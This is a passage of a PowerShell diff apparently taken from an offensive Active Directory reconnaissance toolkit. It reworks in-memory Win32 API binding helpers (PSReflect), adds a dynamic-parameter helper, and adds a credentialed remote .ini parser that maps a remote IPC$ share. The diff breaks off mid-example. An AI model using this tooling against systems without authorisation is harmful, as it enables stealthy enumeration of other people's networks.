- (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
- (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
- (func ntdll RtlGetCurrentPeb ([IntPtr]) @())
- )
+$FunctionDefinitions = @(
+ (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
+ (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
+ (func ntdll RtlGetCurrentPeb ([IntPtr]) @())
+)
- $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
- $Kernel32 = $Types['kernel32']
- $Ntdll = $Types['ntdll']
- $Ntdll::RtlGetCurrentPeb()
- $ntdllbase = $Kernel32::GetModuleHandle('ntdll')
- $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
+$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
+$Kernel32 = $Types['kernel32']
+$Ntdll = $Types['ntdll']
+$Ntdll::RtlGetCurrentPeb()
+$ntdllbase = $Kernel32::GetModuleHandle('ntdll')
+$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
- .NOTES
+.NOTES
- Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
+Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
- When defining multiple function prototypes, it is ideal to provide
- Add-Win32Type with an array of function signatures. That way, they
- are all incorporated into the same in-memory module.
+When defining multiple function prototypes, it is ideal to provide
+Add-Win32Type with an array of function signatures. That way, they
+are all incorporated into the same in-memory module.
#>
[OutputType([Hashtable])]
Param(
- [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[String]
$DllName,
- [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[String]
$FunctionName,
- [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [Parameter(ValueFromPipelineByPropertyName=$True)]
+ [String]
+ $EntryPoint,
+
+ [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[Type]
$ReturnType,
- [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [Parameter(ValueFromPipelineByPropertyName=$True)]
[Type[]]
$ParameterTypes,
- [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [Parameter(ValueFromPipelineByPropertyName=$True)]
[Runtime.InteropServices.CallingConvention]
$NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,
- [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [Parameter(ValueFromPipelineByPropertyName=$True)]
[Runtime.InteropServices.CharSet]
$Charset = [Runtime.InteropServices.CharSet]::Auto,
- [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [Parameter(ValueFromPipelineByPropertyName=$True)]
[Switch]
$SetLastError,
- [Parameter(Mandatory = $True)]
+ [Parameter(Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Module,
@@ -290,11 +303,11 @@ function Add-Win32Type
# Make each ByRef parameter an Out parameter
$i = 1
- ForEach($Parameter in $ParameterTypes)
+ foreach($Parameter in $ParameterTypes)
{
if ($Parameter.IsByRef)
{
- [void] $Method.DefineParameter($i, 'Out', $Null)
+ [void] $Method.DefineParameter($i, 'Out', $null)
}
$i++
@@ -304,14 +317,23 @@ function Add-Win32Type
$SetLastErrorField = $DllImport.GetField('SetLastError')
$CallingConventionField = $DllImport.GetField('CallingConvention')
$CharsetField = $DllImport.GetField('CharSet')
+ $EntryPointField = $DllImport.GetField('EntryPoint')
if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }
+ if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }
+
# Equivalent to C# version of [DllImport(DllName)]
$Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])
$DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,
$DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),
- [Reflection.FieldInfo[]] @($SetLastErrorField, $CallingConventionField, $CharsetField),
- [Object[]] @($SLEValue, ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), ([Runtime.InteropServices.CharSet] $Charset)))
+ [Reflection.FieldInfo[]] @($SetLastErrorField,
+ $CallingConventionField,
+ $CharsetField,
+ $EntryPointField),
+ [Object[]] @($SLEValue,
+ ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),
+ ([Runtime.InteropServices.CharSet] $Charset),
+ $ExportedFuncName))
$Method.SetCustomAttribute($DllImportAttribute)
}
@@ -326,7 +348,7 @@ function Add-Win32Type
$ReturnTypes = @{}
- ForEach ($Key in $TypeHash.Keys)
+ foreach ($Key in $TypeHash.Keys)
{
$Type = $TypeHash[$Key].CreateType()
@@ -338,90 +360,88 @@ function Add-Win32Type
}
-function psenum
-{
+function psenum {
<#
- .SYNOPSIS
+.SYNOPSIS
- Creates an in-memory enumeration for use in your PowerShell session.
+Creates an in-memory enumeration for use in your PowerShell session.
- Author: Matthew Graeber (@mattifestation)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
-
- .DESCRIPTION
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
- The 'psenum' function facilitates the creation of enums entirely in
- memory using as close to a "C style" as PowerShell will allow.
+.DESCRIPTION
- .PARAMETER Module
+The 'psenum' function facilitates the creation of enums entirely in
+memory using as close to a "C style" as PowerShell will allow.
- The in-memory module that will host the enum. Use
- New-InMemoryModule to define an in-memory module.
+.PARAMETER Module
- .PARAMETER FullName
+The in-memory module that will host the enum. Use
+New-InMemoryModule to define an in-memory module.
- The fully-qualified name of the enum.
+.PARAMETER FullName
- .PARAMETER Type
+The fully-qualified name of the enum.
- The type of each enum element.
+.PARAMETER Type
- .PARAMETER EnumElements
+The type of each enum element.
- A hashtable of enum elements.
+.PARAMETER EnumElements
- .PARAMETER Bitfield
+A hashtable of enum elements.
- Specifies that the enum should be treated as a bitfield.
+.PARAMETER Bitfield
- .EXAMPLE
+Specifies that the enum should be treated as a bitfield.
- $Mod = New-InMemoryModule -ModuleName Win32
+.EXAMPLE
- $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
- UNKNOWN = 0
- NATIVE = 1 # Image doesn't require a subsystem.
- WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem.
- WINDOWS_CUI = 3 # Image runs in the Windows character subsystem.
- OS2_CUI = 5 # Image runs in the OS/2 character subsystem.
- POSIX_CUI = 7 # Image runs in the Posix character subsystem.
- NATIVE_WINDOWS = 8 # Image is a native Win9x driver.
- WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem.
- EFI_APPLICATION = 10
- EFI_BOOT_SERVICE_DRIVER = 11
- EFI_RUNTIME_DRIVER = 12
- EFI_ROM = 13
- XBOX = 14
- WINDOWS_BOOT_APPLICATION = 16
- }
+$Mod = New-InMemoryModule -ModuleName Win32
+
+$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
+ UNKNOWN = 0
+ NATIVE = 1 # Image doesn't require a subsystem.
+ WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem.
+ WINDOWS_CUI = 3 # Image runs in the Windows character subsystem.
+ OS2_CUI = 5 # Image runs in the OS/2 character subsystem.
+ POSIX_CUI = 7 # Image runs in the Posix character subsystem.
+ NATIVE_WINDOWS = 8 # Image is a native Win9x driver.
+ WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem.
+ EFI_APPLICATION = 10
+ EFI_BOOT_SERVICE_DRIVER = 11
+ EFI_RUNTIME_DRIVER = 12
+ EFI_ROM = 13
+ XBOX = 14
+ WINDOWS_BOOT_APPLICATION = 16
+}
- .NOTES
+.NOTES
- PowerShell purists may disagree with the naming of this function but
- again, this was developed in such a way so as to emulate a "C style"
- definition as closely as possible. Sorry, I'm not going to name it
- New-Enum. :P
+PowerShell purists may disagree with the naming of this function but
+again, this was developed in such a way so as to emulate a "C style"
+definition as closely as possible. Sorry, I'm not going to name it
+New-Enum. :P
#>
[OutputType([Type])]
- Param
- (
- [Parameter(Position = 0, Mandatory = $True)]
+ Param (
+ [Parameter(Position = 0, Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Module,
- [Parameter(Position = 1, Mandatory = $True)]
+ [Parameter(Position = 1, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$FullName,
- [Parameter(Position = 2, Mandatory = $True)]
+ [Parameter(Position = 2, Mandatory=$True)]
[Type]
$Type,
- [Parameter(Position = 3, Mandatory = $True)]
+ [Parameter(Position = 3, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[Hashtable]
$EnumElements,
@@ -446,10 +466,10 @@ function psenum
$EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)
}
- ForEach ($Key in $EnumElements.Keys)
+ foreach ($Key in $EnumElements.Keys)
{
# Apply the specified enum type to each element
- $Null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
+ $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
}
$EnumBuilder.CreateType()
@@ -458,15 +478,13 @@ function psenum
# A helper function used to reduce typing while defining struct
# fields.
-function field
-{
- Param
- (
- [Parameter(Position = 0, Mandatory = $True)]
+function field {
+ Param (
+ [Parameter(Position = 0, Mandatory=$True)]
[UInt16]
$Position,
- [Parameter(Position = 1, Mandatory = $True)]
+ [Parameter(Position = 1, Mandatory=$True)]
[Type]
$Type,
@@ -490,111 +508,110 @@ function field
function struct
{
<#
- .SYNOPSIS
+.SYNOPSIS
- Creates an in-memory struct for use in your PowerShell session.
+Creates an in-memory struct for use in your PowerShell session.
- Author: Matthew Graeber (@mattifestation)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: field
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: field
- .DESCRIPTION
+.DESCRIPTION
- The 'struct' function facilitates the creation of structs entirely in
- memory using as close to a "C style" as PowerShell will allow. Struct
- fields are specified using a hashtable where each field of the struct
- is comprosed of the order in which it should be defined, its .NET
- type, and optionally, its offset and special marshaling attributes.
+The 'struct' function facilitates the creation of structs entirely in
+memory using as close to a "C style" as PowerShell will allow. Struct
+fields are specified using a hashtable where each field of the struct
+is comprosed of the order in which it should be defined, its .NET
+type, and optionally, its offset and special marshaling attributes.
- One of the features of 'struct' is that after your struct is defined,
- it will come with a built-in GetSize method as well as an explicit
- converter so that you can easily cast an IntPtr to the struct without
- relying upon calling SizeOf and/or PtrToStructure in the Marshal
- class.
+One of the features of 'struct' is that after your struct is defined,
+it will come with a built-in GetSize method as well as an explicit
+converter so that you can easily cast an IntPtr to the struct without
+relying upon calling SizeOf and/or PtrToStructure in the Marshal
+class.
- .PARAMETER Module
+.PARAMETER Module
- The in-memory module that will host the struct. Use
- New-InMemoryModule to define an in-memory module.
+The in-memory module that will host the struct. Use
+New-InMemoryModule to define an in-memory module.
- .PARAMETER FullName
+.PARAMETER FullName
- The fully-qualified name of the struct.
+The fully-qualified name of the struct.
- .PARAMETER StructFields
+.PARAMETER StructFields
- A hashtable of fields. Use the 'field' helper function to ease
- defining each field.
+A hashtable of fields. Use the 'field' helper function to ease
+defining each field.
- .PARAMETER PackingSize
+.PARAMETER PackingSize
- Specifies the memory alignment of fields.
+Specifies the memory alignment of fields.
- .PARAMETER ExplicitLayout
+.PARAMETER ExplicitLayout
- Indicates that an explicit offset for each field will be specified.
+Indicates that an explicit offset for each field will be specified.
- .EXAMPLE
+.EXAMPLE
- $Mod = New-InMemoryModule -ModuleName Win32
+$Mod = New-InMemoryModule -ModuleName Win32
- $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
- DOS_SIGNATURE = 0x5A4D
- OS2_SIGNATURE = 0x454E
- OS2_SIGNATURE_LE = 0x454C
- VXD_SIGNATURE = 0x454C
- }
+$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
+ DOS_SIGNATURE = 0x5A4D
+ OS2_SIGNATURE = 0x454E
+ OS2_SIGNATURE_LE = 0x454C
+ VXD_SIGNATURE = 0x454C
+}
- $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
- e_magic = field 0 $ImageDosSignature
- e_cblp = field 1 UInt16
- e_cp = field 2 UInt16
- e_crlc = field 3 UInt16
- e_cparhdr = field 4 UInt16
- e_minalloc = field 5 UInt16
- e_maxalloc = field 6 UInt16
- e_ss = field 7 UInt16
- e_sp = field 8 UInt16
- e_csum = field 9 UInt16
- e_ip = field 10 UInt16
- e_cs = field 11 UInt16
- e_lfarlc = field 12 UInt16
- e_ovno = field 13 UInt16
- e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4)
- e_oemid = field 15 UInt16
- e_oeminfo = field 16 UInt16
- e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10)
- e_lfanew = field 18 Int32
- }
+$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
+ e_magic = field 0 $ImageDosSignature
+ e_cblp = field 1 UInt16
+ e_cp = field 2 UInt16
+ e_crlc = field 3 UInt16
+ e_cparhdr = field 4 UInt16
+ e_minalloc = field 5 UInt16
+ e_maxalloc = field 6 UInt16
+ e_ss = field 7 UInt16
+ e_sp = field 8 UInt16
+ e_csum = field 9 UInt16
+ e_ip = field 10 UInt16
+ e_cs = field 11 UInt16
+ e_lfarlc = field 12 UInt16
+ e_ovno = field 13 UInt16
+ e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4)
+ e_oemid = field 15 UInt16
+ e_oeminfo = field 16 UInt16
+ e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10)
+ e_lfanew = field 18 Int32
+}
- # Example of using an explicit layout in order to create a union.
- $TestUnion = struct $Mod TestUnion @{
- field1 = field 0 UInt32 0
- field2 = field 1 IntPtr 0
- } -ExplicitLayout
+# Example of using an explicit layout in order to create a union.
+$TestUnion = struct $Mod TestUnion @{
+ field1 = field 0 UInt32 0
+ field2 = field 1 IntPtr 0
+} -ExplicitLayout
- .NOTES
+.NOTES
- PowerShell purists may disagree with the naming of this function but
- again, this was developed in such a way so as to emulate a "C style"
- definition as closely as possible. Sorry, I'm not going to name it
- New-Struct. :P
+PowerShell purists may disagree with the naming of this function but
+again, this was developed in such a way so as to emulate a "C style"
+definition as closely as possible. Sorry, I'm not going to name it
+New-Struct. :P
#>
[OutputType([Type])]
- Param
- (
- [Parameter(Position = 1, Mandatory = $True)]
+ Param (
+ [Parameter(Position = 1, Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Module,
- [Parameter(Position = 2, Mandatory = $True)]
+ [Parameter(Position = 2, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$FullName,
- [Parameter(Position = 3, Mandatory = $True)]
+ [Parameter(Position = 3, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[Hashtable]
$StructFields,
@@ -635,13 +652,13 @@ function struct
# Sort each field according to the orders specified
# Unfortunately, PSv2 doesn't have the luxury of the
# hashtable [Ordered] accelerator.
- ForEach ($Field in $StructFields.Keys)
+ foreach ($Field in $StructFields.Keys)
{
$Index = $StructFields[$Field]['Position']
$Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}
}
- ForEach ($Field in $Fields)
+ foreach ($Field in $Fields)
{
$FieldName = $Field['FieldName']
$FieldProp = $Field['Properties']
@@ -714,480 +731,1369 @@ function struct
#
########################################################
-filter Get-IniContent {
+Function New-DynamicParameter {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Helper function to simplify creating dynamic parameters.
+
+ Adapated from https://beatcracker.wordpress.com/2015/08/10/dynamic-parameters-validateset-and-enums/.
+ Originally released under the Microsoft Public License (Ms-PL).
+
+.DESCRIPTION
+
+Helper function to simplify creating dynamic parameters.
+
+Example use cases:
+ Include parameters only if your environment dictates it
+ Include parameters depending on the value of a user-specified parameter
+ Provide tab completion and intellisense for parameters, depending on the environment
+
+Please keep in mind that all dynamic parameters you create, will not have corresponding variables created.
+ Use New-DynamicParameter with 'CreateVariables' switch in your main code block,
+ ('Process' for advanced functions) to create those variables.
+ Alternatively, manually reference $PSBoundParameters for the dynamic parameter value.
+
+This function has two operating modes:
+
+1. All dynamic parameters created in one pass using pipeline input to the function. This mode allows to create dynamic parameters en masse,
+with one function call. There is no need to create and maintain custom RuntimeDefinedParameterDictionary.
+
+2. Dynamic parameters are created by separate function calls and added to the RuntimeDefinedParameterDictionary you created beforehand.
+Then you output this RuntimeDefinedParameterDictionary to the pipeline. This allows more fine-grained control of the dynamic parameters,
+with custom conditions and so on.
+
+.NOTES
+
+Credits to jrich523 and ramblingcookiemonster for their initial code and inspiration:
+ https://github.com/RamblingCookieMonster/PowerShell/blob/master/New-DynamicParam.ps1
+ http://ramblingcookiemonster.wordpress.com/2014/11/27/quick-hits-credentials-and-dynamic-parameters/
+ http://jrich523.wordpress.com/2013/05/30/powershell-simple-way-to-add-dynamic-parameters-to-advanced-function/
+
+Credit to BM for alias and type parameters and their handling
+
+.PARAMETER Name
+
+Name of the dynamic parameter
+
+.PARAMETER Type
+
+Type for the dynamic parameter. Default is string
+
+.PARAMETER Alias
+
+If specified, one or more aliases to assign to the dynamic parameter
+
+.PARAMETER Mandatory
+
+If specified, set the Mandatory attribute for this dynamic parameter
+
+.PARAMETER Position
+
+If specified, set the Position attribute for this dynamic parameter
+
+.PARAMETER HelpMessage
+
+If specified, set the HelpMessage for this dynamic parameter
+
+.PARAMETER DontShow
+
+If specified, set the DontShow for this dynamic parameter.
+This is the new PowerShell 4.0 attribute that hides parameter from tab-completion.
+http://www.powershellmagazine.com/2013/07/29/pstip-hiding-parameters-from-tab-completion/
+
+.PARAMETER ValueFromPipeline
+
+If specified, set the ValueFromPipeline attribute for this dynamic parameter
+
+.PARAMETER ValueFromPipelineByPropertyName
+
+If specified, set the ValueFromPipelineByPropertyName attribute for this dynamic parameter
+
+.PARAMETER ValueFromRemainingArguments
+
+If specified, set the ValueFromRemainingArguments attribute for this dynamic parameter
+
+.PARAMETER ParameterSetName
+
+If specified, set the ParameterSet attribute for this dynamic parameter. By default parameter is added to all parameters sets.
+
+.PARAMETER AllowNull
+
+If specified, set the AllowNull attribute of this dynamic parameter
+
+.PARAMETER AllowEmptyString
+
+If specified, set the AllowEmptyString attribute of this dynamic parameter
+
+.PARAMETER AllowEmptyCollection
+
+If specified, set the AllowEmptyCollection attribute of this dynamic parameter
+
+.PARAMETER ValidateNotNull
+
+If specified, set the ValidateNotNull attribute of this dynamic parameter
+
+.PARAMETER ValidateNotNullOrEmpty
+
+If specified, set the ValidateNotNullOrEmpty attribute of this dynamic parameter
+
+.PARAMETER ValidateRange
+
+If specified, set the ValidateRange attribute of this dynamic parameter
- This helper parses an .ini file into a proper PowerShell object.
-
- Author: 'The Scripting Guys'
- Link: https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
+.PARAMETER ValidateLength
- .LINK
+If specified, set the ValidateLength attribute of this dynamic parameter
- https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
+.PARAMETER ValidatePattern
+
+If specified, set the ValidatePattern attribute of this dynamic parameter
+
+.PARAMETER ValidateScript
+
+If specified, set the ValidateScript attribute of this dynamic parameter
+
+.PARAMETER ValidateSet
+
+If specified, set the ValidateSet attribute of this dynamic parameter
+
+.PARAMETER Dictionary
+
+If specified, add resulting RuntimeDefinedParameter to an existing RuntimeDefinedParameterDictionary.
+Appropriate for custom dynamic parameters creation.
+
+If not specified, create and return a RuntimeDefinedParameterDictionary
+Appropriate for a simple dynamic parameter creation.
#>
+
+ [CmdletBinding(DefaultParameterSetName = 'DynamicParameter')]
+ Param (
+ [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateNotNullOrEmpty()]
+ [string]$Name,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [System.Type]$Type = [int],
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [string[]]$Alias,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$Mandatory,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [int]$Position,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [string]$HelpMessage,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$DontShow,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$ValueFromPipeline,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$ValueFromPipelineByPropertyName,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$ValueFromRemainingArguments,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [string]$ParameterSetName = '__AllParameterSets',
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$AllowNull,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$AllowEmptyString,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$AllowEmptyCollection,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$ValidateNotNull,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [switch]$ValidateNotNullOrEmpty,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateCount(2,2)]
+ [int[]]$ValidateCount,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateCount(2,2)]
+ [int[]]$ValidateRange,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateCount(2,2)]
+ [int[]]$ValidateLength,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateNotNullOrEmpty()]
+ [string]$ValidatePattern,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateNotNullOrEmpty()]
+ [scriptblock]$ValidateScript,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateNotNullOrEmpty()]
+ [string[]]$ValidateSet,
+
+ [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
+ [ValidateNotNullOrEmpty()]
+ [ValidateScript({
+ if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary]))
+ {
+ Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object'
+ }
+ $true
+ })]
+ $Dictionary = $false,
+
+ [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')]
+ [switch]$CreateVariables,
+
+ [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')]
+ [ValidateNotNullOrEmpty()]
+ [ValidateScript({
+ # System.Management.Automation.PSBoundParametersDictionary is an internal sealed class,
+ # so one can't use PowerShell's '-is' operator to validate type.
+ if($_.GetType().Name -notmatch 'Dictionary') {
+ Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object'
+ }
+ $true
+ })]
+ $BoundParameters
+ )
+
+ Begin {
+ $InternalDictionary = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary
+ function _temp { [CmdletBinding()] Param() }
+ $CommonParameters = (Get-Command _temp).Parameters.Keys
+ }
+
+ Process {
+ if($CreateVariables) {
+ $BoundKeys = $BoundParameters.Keys | Where-Object { $CommonParameters -notcontains $_ }
+ ForEach($Parameter in $BoundKeys) {
+ if ($Parameter) {
+ Set-Variable -Name $Parameter -Value $BoundParameters.$Parameter -Scope 1 -Force
+ }
+ }
+ }
+ else {
+ $StaleKeys = @()
+ $StaleKeys = $PSBoundParameters.GetEnumerator() |
+ ForEach-Object {
+ if($_.Value.PSobject.Methods.Name -match '^Equals$') {
+ # If object has Equals, compare bound key and variable using it
+ if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) {
+ $_.Key
+ }
+ }
+ else {
+ # If object doesn't has Equals (e.g. $null), fallback to the PowerShell's -ne operator
+ if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) {
+ $_.Key
+ }
+ }
+ }
+ if($StaleKeys) {
+ $StaleKeys | ForEach-Object {[void]$PSBoundParameters.Remove($_)}
+ }
+
+ # Since we rely solely on $PSBoundParameters, we don't have access to default values for unbound parameters
+ $UnboundParameters = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator() |
+ # Find parameters that are belong to the current parameter set
+ Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } |
+ Select-Object -ExpandProperty Key |
+ # Find unbound parameters in the current parameter set
+ Where-Object { $PSBoundParameters.Keys -notcontains $_ }
+
+ # Even if parameter is not bound, corresponding variable is created with parameter's default value (if specified)
+ $tmp = $null
+ ForEach ($Parameter in $UnboundParameters) {
+ $DefaultValue = Get-Variable -Name $Parameter -ValueOnly -Scope 0
+ if(!$PSBoundParameters.TryGetValue($Parameter, [ref]$tmp) -and $DefaultValue) {
+ $PSBoundParameters.$Parameter = $DefaultValue
+ }
+ }
+
+ if($Dictionary) {
+ $DPDictionary = $Dictionary
+ }
+ else {
+ $DPDictionary = $InternalDictionary
+ }
+
+ # Shortcut for getting local variables
+ $GetVar = {Get-Variable -Name $_ -ValueOnly -Scope 0}
+
+ # Strings to match attributes and validation arguments
+ $AttributeRegex = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$'
+ $ValidationRegex = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$'
+ $AliasRegex = '^Alias$'
+ $ParameterAttribute = New-Object -TypeName System.Management.Automation.ParameterAttribute
+
+ switch -regex ($PSBoundParameters.Keys) {
+ $AttributeRegex {
+ Try {
+ $ParameterAttribute.$_ = . $GetVar
+ }
+ Catch {
+ $_
+ }
+ continue
+ }
+ }
+
+ if($DPDictionary.Keys -contains $Name) {
+ $DPDictionary.$Name.Attributes.Add($ParameterAttribute)
+ }
+ else {
+ $AttributeCollection = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute]
+ switch -regex ($PSBoundParameters.Keys) {
+ $ValidationRegex {
+ Try {
+ $ParameterOptions = New-Object -TypeName "System.Management.Automation.${_}Attribute" -ArgumentList (. $GetVar) -ErrorAction Stop
+ $AttributeCollection.Add($ParameterOptions)
+ }
+ Catch { $_ }
+ continue
+ }
+ $AliasRegex {
+ Try {
+ $ParameterAlias = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $GetVar) -ErrorAction Stop
+ $AttributeCollection.Add($ParameterAlias)
+ continue
+ }
+ Catch { $_ }
+ }
+ }
+ $AttributeCollection.Add($ParameterAttribute)
+ $Parameter = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $AttributeCollection)
+ $DPDictionary.Add($Name, $Parameter)
+ }
+ }
+ }
+
+ End {
+ if(!$CreateVariables -and !$Dictionary) {
+ $DPDictionary
+ }
+ }
+}
+
+
+function Get-IniContent {
+<#
+.SYNOPSIS
+
+This helper parses an .ini file into a hashtable.
+
+Author: 'The Scripting Guys'
+Modifications: @harmj0y (-Credential support)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
+
+.DESCRIPTION
+
+Parses an .ini file into a hashtable. If -Credential is supplied,
+then Add-RemoteConnection is used to map \\COMPUTERNAME\IPC$, the file
+is parsed, and then the connection is destroyed with Remove-RemoteConnection.
+
+.PARAMETER Path
+
+Specifies the path to the .ini file to parse.
+
+.PARAMETER OutputObject
+
+Switch. Output a custom PSObject instead of a hashtable.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+Get-IniContent C:\Windows\example.ini
+
+.EXAMPLE
+
+"C:\Windows\example.ini" | Get-IniContent -OutputObject
+
+Outputs the .ini details as a proper nested PSObject.
+
+.EXAMPLE
+
+"C:\Windows\example.ini" | Get-IniContent
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
